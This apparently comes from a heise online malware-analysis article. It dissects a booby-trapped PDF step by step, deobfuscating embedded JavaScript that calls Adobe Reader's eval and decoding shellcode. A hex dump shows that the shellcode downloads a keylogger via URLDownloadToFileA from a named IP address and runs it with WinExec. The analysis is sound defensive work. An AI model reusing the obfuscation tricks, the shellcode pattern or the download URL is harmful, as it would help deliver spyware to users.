In association with heise online


There are whole sequences of objects containing the tag /Filter /FlateDecode, followed by binary data between stream and endstream. My book tells me that binary data written out as plain hex is marked by /ASCIIHexDecode. /FlateDecode, by contrast, means that the data has to be decompressed using the zlib library.
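To make the /FlateDecode step concrete, here is a minimal sketch in JavaScript for Node.js (an assumption; the article itself relies on a ready-made toolkit). It builds a toy object around a zlib-compressed stream and inflates it again. The helper name inflateFirstStream and the toy object are hypothetical, and the sketch assumes a single filter and a /Length given as a direct integer; a real PDF needs a proper parser.

```javascript
const zlib = require('zlib');

// Hypothetical helper: inflate the first stream in a buffer.
// Assumes one /FlateDecode filter and a direct integer /Length.
function inflateFirstStream(pdfBytes) {
  // latin1 maps each byte to one character, so string offsets equal byte offsets.
  const text = pdfBytes.toString('latin1');
  const match = /\/Length\s+(\d+)[\s\S]*?>>\s*stream(\r\n|\n)/.exec(text);
  if (!match) return null;
  const length = Number(match[1]);
  const start = match.index + match[0].length;
  return zlib.inflateSync(pdfBytes.subarray(start, start + length));
}

// Toy object for illustration only; the script text is the fragment quoted from object 62.
const script = "this.nfMZkYrtz='nfMZkYrtz';var lookYears = 'var t';";
const packed = zlib.deflateSync(Buffer.from(script, 'latin1'));
const toyObject = Buffer.concat([
  Buffer.from(`62 0 obj\n<< /Filter /FlateDecode /Length ${packed.length} >>\nstream\n`, 'latin1'),
  packed,
  Buffer.from('\nendstream\nendobj\n', 'latin1'),
]);

const recovered = inflateFirstStream(toyObject).toString('latin1');
console.log(recovered);
```

Reading the byte count from /Length rather than searching for endstream avoids cutting the compressed data short if those bytes happen to occur inside it.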

Fortunately, I don't need to reinvent the wheel to do this. Stuart's book includes a PDF toolkit able to do pretty much anything you need to a PDF file, such as removing single pages, reading encrypted PDFs (password still required) or generating an uncompressed version using

$ pdftk NTFS-internals.pdf output plain.txt uncompress

This inflates the file from 15 to 38 KB. But now I at least have a chance of working out what's going on. In 'plain.txt', I skip past pages of formatting-related columns of figures, a few JPEG images and font instructions. But hold on. Back a bit – I think I've found something. The stream in object 62 looks a lot like JavaScript:

this.nfMZkYrtz='nfMZkYrtz';var lookYears = 'var t';

Of course – I remember that PDF files can contain JavaScript. A closer look and I twig that the strings assigned to the variables are themselves snippets of JavaScript. var t, for example, ends up in lookYears, and a little further down the keyword new is assigned to duringFactIf. The point of this becomes clear as I check out object 63, which contains further JavaScript:

var out = '' + lookYears+

OK – so code is being assembled in the out variable. Further down, in object 65, comes what looks like an attempt to call this code:

function fBE1wMund0(){}

The odd-looking fBE1wMund0(){} function is just a diversion. But I'll bet ex is intended to run the JavaScript function eval() in order to execute the assembled code.

But I'm starting to think that disentangling the heavily nested obfuscation functions by hand is getting too tedious; that, after all, is what SpiderMonkey is for. So I extract all the JavaScript fragments into a file. To see what it's supposed to execute, I replace the ex["e"+"val"](out); with a harmless print command and, half an hour later, throw it to the JavaScript monkey.

Inevitably it comes a cropper on the first try: "ReferenceError: app is not defined". The stumbling block proves to be the line

var ex = app;

And now the penny drops – ex is nothing less than a reference to Adobe Reader itself, which can be accessed from within a PDF file by using app. The ex["eval"](out) code snippet is thus a somewhat eccentric, but valid way of writing app.eval – it is indeed an attempt to execute the code.

Of course SpiderMonkey isn't familiar with app. Since I've removed the eval statement anyway, I can simply comment out the offending assignment. The second attempt works like a charm and SpiderMonkey spits out more JavaScript, which I write to another file.
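An alternative to commenting out the assignment is to hand the script a fake app whose eval() only records what it is given. The following is a minimal sketch for Node.js, not the sample's actual code: the stub object, the captured array and the placeholder payload are assumptions made for illustration; only the names lookYears, duringFactIf, out and ex come from the sample.

```javascript
// Stand-in for Adobe Reader's `app` object (hypothetical stub):
// its eval() records the code it is handed and never runs it.
const captured = [];
const app = {
  eval(code) {
    captured.push(String(code));
  },
};

// Fragments in the style of the sample. The variable names are from the
// article; the rest of the assembled statement is a harmless placeholder.
var lookYears = 'var t';
var duringFactIf = 'new';
var out = '' + lookYears + ' = ' + duringFactIf + ' Array(1, 2, 3);';

var ex = app;
// Bracket notation with a concatenated key resolves to the same
// property as ex.eval, so this call lands in the stub above.
ex['e' + 'val'](out);

console.log(captured[0]); // var t = new Array(1, 2, 3);
```

Because the stub never executes anything, the assembled code can be inspected or written to a file for the next round of analysis.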

Near the start, an array containing more than 1,000 oddly split Unicode escape sequences is generated:

var wly56uG4w = new Array("%u535","0%u525",    

This looks a lot like shell code to me, obviously intended to be injected and executed via a security vulnerability. To firm up my suspicions, I concatenate the string and interpret the whole thing as hexadecimal code using

perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge'
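The same decoding step can be sketched in JavaScript for Node.js. Each %uXXXX escape holds a 16-bit little-endian word, which is why the two bytes are swapped. The helper name decodePercentU is hypothetical, and the input pieces are made up for illustration in the split style of the array above; they are not taken from the sample. Unlike the Perl one-liner, this version drops any text that is not part of an escape.

```javascript
// Hypothetical helper mirroring the Perl one-liner: for every %uXXXX
// escape, emit the low byte (last two hex digits) first, then the high byte.
function decodePercentU(escaped) {
  const bytes = [];
  const pattern = /%u([0-9a-fA-F]{2})([0-9a-fA-F]{2})/g;
  let match;
  while ((match = pattern.exec(escaped)) !== null) {
    bytes.push(parseInt(match[2], 16), parseInt(match[1], 16));
  }
  return Buffer.from(bytes);
}

// Illustrative input, split mid-escape like the array in the sample,
// so the pieces have to be concatenated before decoding.
const pieces = ['%u654', '7%u547', '4'];
const shellcode = decodePercentU(pieces.join(''));

console.log(shellcode.toString('hex'));    // 47657454
console.log(shellcode.toString('latin1')); // GetT
```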

As I check the code generated in a hex editor, I find definitive proof that there's bad shit going down.

00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 65 |..............Ge|
00000160 74 54 65 6d 70 50 61 74 68 41 00 4c 6f 61 64 4c |tTempPathA.LoadL|
00000170 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 |ibraryA.GetProcA|
00000180 64 64 72 65 73 73 00 57 69 6e 45 78 65 63 00 bb |ddress.WinExec.?|
00000190 89 f2 89 f7 30 c0 ae 75 fd 29 f7 89 f9 31 c0 be |.?.?0??u?)?.?1??|
00000230 00 56 57 e8 58 ff ff ff 5f 5e ab 01 ce 80 3e bb |.VW?X???_^?.?.>?|
00000240 74 02 eb ed c3 55 52 4c 4d 4f 4e 2e 44 4c 4c 00 |t.???URLMON.DLL.|
00000250 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c |URLDownloadToFil|
00000260 65 41 00 75 70 64 61 74 65 2e 65 78 65 00 63 72 |eA.update.exe.cr|
00000270 61 73 68 2e 70 68 70 00 68 74 74 70 3a 2f 2f 32 |ash.php.http://2|
00000280 31 30 2e 35 31 2e 31 38 37 2e 34 35 2f 6c 69 62 |10.51.187.45/lib|
00000290 2f 75 70 64 61 74 65 2e 70 68 70 3f 69 64 3d 30 |/update.php?id=0|
000002a0 00 90 |..|
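The API names that stand out in the dump are NUL-terminated ASCII strings, so they can also be listed automatically, much as the Unix strings tool would do. The following is a minimal sketch for Node.js; the helper name extractStrings and the minimum length of four characters are assumptions, and the bytes are copied from offsets 0x15e to 0x18f of the dump above.

```javascript
// Hypothetical helper: collect runs of printable ASCII characters
// that are at least minLength long.
function extractStrings(bytes, minLength = 4) {
  const found = [];
  let current = '';
  for (const byte of bytes) {
    if (byte >= 0x20 && byte <= 0x7e) {
      current += String.fromCharCode(byte);
    } else {
      if (current.length >= minLength) found.push(current);
      current = '';
    }
  }
  if (current.length >= minLength) found.push(current);
  return found;
}

// Bytes taken from the hex dump, offsets 0x15e to 0x18f.
const dump = [
  '47 65',
  '74 54 65 6d 70 50 61 74 68 41 00 4c 6f 61 64 4c',
  '69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41',
  '64 64 72 65 73 73 00 57 69 6e 45 78 65 63 00 bb',
].join(' ');
const dumpBytes = Buffer.from(dump.replace(/\s+/g, ''), 'hex');

const names = extractStrings(dumpBytes);
console.log(names); // [ 'GetTempPathA', 'LoadLibraryA', 'GetProcAddress', 'WinExec' ]
```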

The emerging URL points to a file which Virustotal's bank of anti-virus software unanimously diagnoses as concealing a key logger. The code appears to try to save the key logger to the Temp folder as 'update.exe' and execute it using WinExec. But has it succeeded in infecting my system? Since, according to Virustotal, my anti-virus software detects this piece of spyware, it should have warned me if it had succeeded in penetrating the system.

But there are two more arrays of shell code. Analysing them throws up the same URL, but with the parameters 'id=1' and 'id=2' respectively. This suggests other pieces of malware can also be downloaded.
